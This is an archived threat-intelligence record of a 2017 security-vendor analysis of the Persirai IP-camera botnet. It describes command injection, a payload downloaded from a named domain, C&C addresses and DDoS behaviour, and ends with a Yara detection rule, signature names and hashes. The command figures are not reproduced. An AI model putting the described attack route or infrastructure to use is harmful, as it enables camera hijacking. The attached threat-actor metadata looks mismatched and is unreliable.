{
	"id": "af8f6f01-c1b3-4978-8f52-37d2b7278606",
	"created_at": "2026-04-06T00:10:37.452495Z",
	"updated_at": "2026-04-10T03:30:57.158426Z",
	"deleted_at": null,
	"sha1_hash": "4922da04d63105ac727a980898b79cd96bb6dd8b",
	"title": "Persirai: New IoT Botnet Targets IP Cameras",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 78804,
	"plain_text": "Persirai: New IoT Botnet Targets IP Cameras\r\nBy By: Tim Yeh, Dove Chiu, Kenney Lu May 09, 2017 Read time: 4 min (1147 words)\r\nPublished: 2017-05-09 · Archived: 2026-04-05 15:41:40 UTC\r\nUpdated on May 10, 2017, 6:52 PM (UTC-7): We updated the source code and made changes to Figures 4 and 6.\r\nA new Internet of Things (IoT) botnet called Persirai (Detected by Trend Micro as ELF_PERSIRAI.A) has been\r\ndiscovered targeting over 1,000 Internet Protocol (IP) Camera models based on various Original Equipment\r\nManufacturer (OEM) products. This development comes on the heels of Mirai—an open-source backdoor\r\nmalware that caused some of the most notable incidents of 2016 via Distributed Denial-of-Service (DDoS) attacks\r\nthat compromised IoT devices such as Digital Video Recorders (DVRs) and CCTV cameras—as well as the\r\nHajime botnet.\r\nWe detected approximately 120,000 IP cameras that are vulnerable to ELF_PERSIRAI.A via Shodan. Many of\r\nthese vulnerable users are unaware that their IP Cameras are exposed to the internet.\r\nFigure 1\r\nFigure 1: The number of vulnerable IP Cameras as of April 26, 2017 (derived from Shodan data)\r\nThis makes it significantly easier for the perpetrators behind the malware to gain access to the IP Camera web\r\ninterface via TCP Port 81.\r\nBehavior and Analysis  \r\nFigure 1\r\nFigure 2: Infection Flow of ELF_PERSIRAI.A\r\nIP Cameras typically use Universal Plug and Play (UPnP), which are network protocols that allow devices to open\r\na port on the router and act like a server, making them highly visible targets for IoT malware.\r\nAfter logging into the vulnerable interface, the attacker can perform a command injection to force the IP Camera\r\nto connect to a download site via the following command:\r\nFigure 1\r\nThe download site will then respond with the following commands:\r\nFigure 1\r\nThese commands will download and execute malicious shell script from the domain ntp.gtpnet.ir T\r\nhe wificam.sh will download and execute the following samples, which will be deleted after execution:\r\nhttp://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/\r\nPage 1 of 4\n\nFigure 1\r\nAfter the samples are downloaded and executed, the malware deletes itself and will only run in memory. It will\r\nalso block the zero-day exploit by pointing ftpupdate.sh and ftpupload.sh to /dev/null to prevent other attackers\r\nfrom targeting the victim’s IP Camera. However, once the camera is rebooted, it will again be vulnerable to the\r\nexploit.\r\nThe affected IP Camera will report to the C\u0026C servers:\r\nload[.]gtpnet[.]ir\r\nntp[.]gtpnet[.]ir\r\n185[.]62[.]189[.]232\r\n95[.]85[.]38[.]103\r\nAfter receiving commands from the server, the IP Camera will then start automatically attacking other IP Cameras\r\nby exploiting a zero-day vulnerability that was made public a few months ago. Attackers exploiting this\r\nvulnerability will be able to get the password file from the user, providing them the means to do command\r\ninjections regardless of password strength.\r\nA sample of the payload is shown below:\r\nFigure 1\r\nFigure 3: ELF_PERSIRAI.A sample payload\r\nThe IP Camera will then receive a command from the C\u0026C server, instructing it to perform a DDoS attack on\r\nother computers via User Datagram Protocol (UDP) floods. Notably, Persirai can perform User Datagram Protocol\r\n(UDP) DDoS attack with SSDP packets without spoofing IP address.\r\nThe backdoor protocol can be seen below:\r\nFigure 1\r\nFigure 4: C\u0026C server backdoor protocol\r\nThe red portions indicate communication from C\u0026C server to the victim’s IP camera. It contains the attack\r\ncommands and DDoS target IP and port.\r\nFigure 5\r\nFigure 5: Special characters used by Persirai\r\nC\u0026C servers we discovered were found to be using the IR country code. We also found some special Persian\r\ncharacters which the malware author used.\r\nThe IP Camera manufacturer for the sample we used claimed that the latest firmware addressed the vulnerability,\r\nso we tried updating the firmware of the IP Camera. However, the firmware indicates that it is already using the\r\nlatest version.\r\nhttp://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/\r\nPage 2 of 4\n\nFigure 1\r\nFigure 6: IP Camera firmware\r\nConclusion and Mitigation\r\nAside from being the first malware that brought IoT security into the limelight, we also noted how Mirai’s open-source nature gave it the potential to act as the core template upon which future IoT-centric malware will be built\r\nupon.\r\nAs the Internet of Things gains traction with ordinary users, cybercriminals may choose to move away from\r\nNetwork Time Protocol (NTP) and Domain Name System (DNS) servers for DDoS attacks, instead concentrating\r\non vulnerable devices—an issue compounded by users that practice lax security measures.\r\nA large number of these attacks were caused by the use of the default password in the device interface. Thus, users\r\nshould change their default password as soon as possible and use a strong password for their devices.\r\nHowever, as seen in the presence of the password-stealing vulnerability mentioned above, a strong password alone\r\ndoes not guarantee device security. IP Camera owners should also implement other steps to ensure that their\r\ndevices are protected from external attacks. In addition to using a strong password, users should also disable UPnP\r\non their routers to prevent devices within the network from opening ports to the external Internet without any\r\nwarning.\r\nThe burden of IoT security does not rest on the user alone—it's also dependent on the vendors themselves, as they\r\nshould be the ones responsible for making sure that their devices are secure and always updated. In line with this,\r\nusers should make sure that their devices are always updated with the latest firmware to minimize the chance of\r\nvulnerability exploits.\r\nTrend Micro Solutions\r\nIn addition to the best practices mentioned above, users can look into solutions such as Trend Micro™\r\nSecurity and Trend Micro Internet Security, which offer effective protection for threat’s to IoT devices using\r\nsecurity features that can detect malware at the endpoint level. Connected devices are protected by security\r\nsolutions such as Trend Micro Home Network Security, which can check internet traffic between the router and all\r\nconnected devices. In addition, enterprises can monitor all ports and network protocols to detect advanced threats\r\nand protect from targeted attacks via Trend Micro™ Deep Discovery™ Inspector .\r\nDeep Discovery Inspector protects customers from this threat via these DDI Rules:\r\nDDI beta rule 3664: \"IP Camera Remote Code Execution - HTTP (Request)”\r\nDDI beta rule 3665: \"IP Camera Authentication Bypass - HTTP (Request)\"\r\nUsers with Trend Micro Home Network Security are protected via the following signatures:\r\n1133578 WEB GoAhead system.ini Information Disclosure Vulnerability -1 (CVE-2017-5674)\r\n1133642 WEB GoAhead system.ini Information Disclosure Vulnerability -2 (CVE-2017-5674)\r\n1133641 WEB Shell Spawning Attempt via telnetd -1.u\r\nhttp://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/\r\nPage 3 of 4\n\nThe Yara rule for detection is provided below:\r\nrule Persirai { meta: description = \"Detects Persirai Botnet Malware\" author = \"Tim Yeh\" reference =\r\n\"Internal Research\" date = \"2017-04-21\" hash1 =\r\n\"f736948bb4575c10a3175f0078a2b5d36cce1aa4cd635307d03c826e305a7489\" hash2 =\r\n\"e0b5c9f874f260c840766eb23c1f69828545d7820f959c8601c41c024044f02c\" hash3 =\r\n\"35317971e346e5b2a8401b2e66b9e62e371ce9532f816cb313216c3647973c32\" hash4 =\r\n\"ff5db7bdb4de17a77bd4a552f50f0e5488281cedc934fc3707833f90484ef66c\" hash5 =\r\n\"ec2c39f1dfb75e7b33daceaeda4dbadb8efd9015a9b7e41d595bb28d2cd0180f\" strings: $x1 =\r\n\"ftpupload.sh\" fullword ascii $x2 = \"/dev/misc/watchdog\" fullword ascii $x3 = \"/dev/watchdog\" ascii\r\n$x4 = \":52869/picsdesc.xml\" fullword ascii $x5 = \"npxXoudifFeEgGaACScs\" fullword ascii $s1 =\r\n\"ftptest.cgi\" fullword ascii $s2 = \"set_ftp.cgi\" fullword ascii $s3 =\r\n\"2580e538f3723927f1ea2fdb8d57b99e9cc37ced1\" fullword ascii $s4 =\r\n\"023ea8c671c0abf77241886465200cf81b1a2bf5e\" fullword ascii condition: uint16(0) == 0x457f and\r\nfilesize \u003c 300KB and ( ( 1 of ($x*) and 1 of ($s*) ) or 2 of ($s*) ) }\r\nRelated SHA256 Hashes detected as ELF_PERSIRAI.A:\r\nd00b79a0b47ae38b2d6fbbf994a2075bc70dc88142536f283e8447ed03917e45\r\nf974695ae560c6f035e089271ee33a84bebeb940be510ab5066ee958932e310a\r\naf4aa29d6e3fce9206b0d21b09b7bc40c3a2128bc5eb02ff239ed2f3549532bb\r\naa443f81cbba72e1692246b5647a9278040400a86afc8e171f54577dc9324f61\r\n4a5ff1def77deb11ddecd10f96e4a1de69291f2f879cd83186c6b3fc20bb009a\r\n44620a09441305f592fb65d606958611f90e85b62b7ef7149e613d794df3a778\r\na58769740a750a8b265df65a5b143a06972af2e7d82c5040d908e71474cbaf92\r\n7d7aaa8c9a36324a2c5e9b0a3440344502f28b90776baa6b8dac7ac88a83aef0\r\n4a5d00f91a5bb2b6b89ccdabc6c13eab97ede5848275513ded7dfd5803b1074b\r\n264e5a7ce9ca7ce7a495ccb02e8f268290fcb1b3e1b05f87d3214b26b0ea9adc\r\nff5db7bdb4de17a77bd4a552f50f0e5488281cedc934fc3707833f90484ef66c\r\nec2c39f1dfb75e7b33daceaeda4dbadb8efd9015a9b7e41d595bb28d2cd0180f\r\nf736948bb4575c10a3175f0078a2b5d36cce1aa4cd635307d03c826e305a7489\r\ne0b5c9f874f260c840766eb23c1f69828545d7820f959c8601c41c024044f02c\r\n35317971e346e5b2a8401b2e66b9e62e371ce9532f816cb313216c3647973c32\r\nSource: http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/\r\nhttp://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/"
	],
	"report_names": [
		"persirai-new-internet-things-iot-botnet-targets-ip-cameras"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434237,
	"ts_updated_at": 1775791857,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4922da04d63105ac727a980898b79cd96bb6dd8b.pdf",
		"text": "https://archive.orkl.eu/4922da04d63105ac727a980898b79cd96bb6dd8b.txt",
		"img": "https://archive.orkl.eu/4922da04d63105ac727a980898b79cd96bb6dd8b.jpg"
	}
}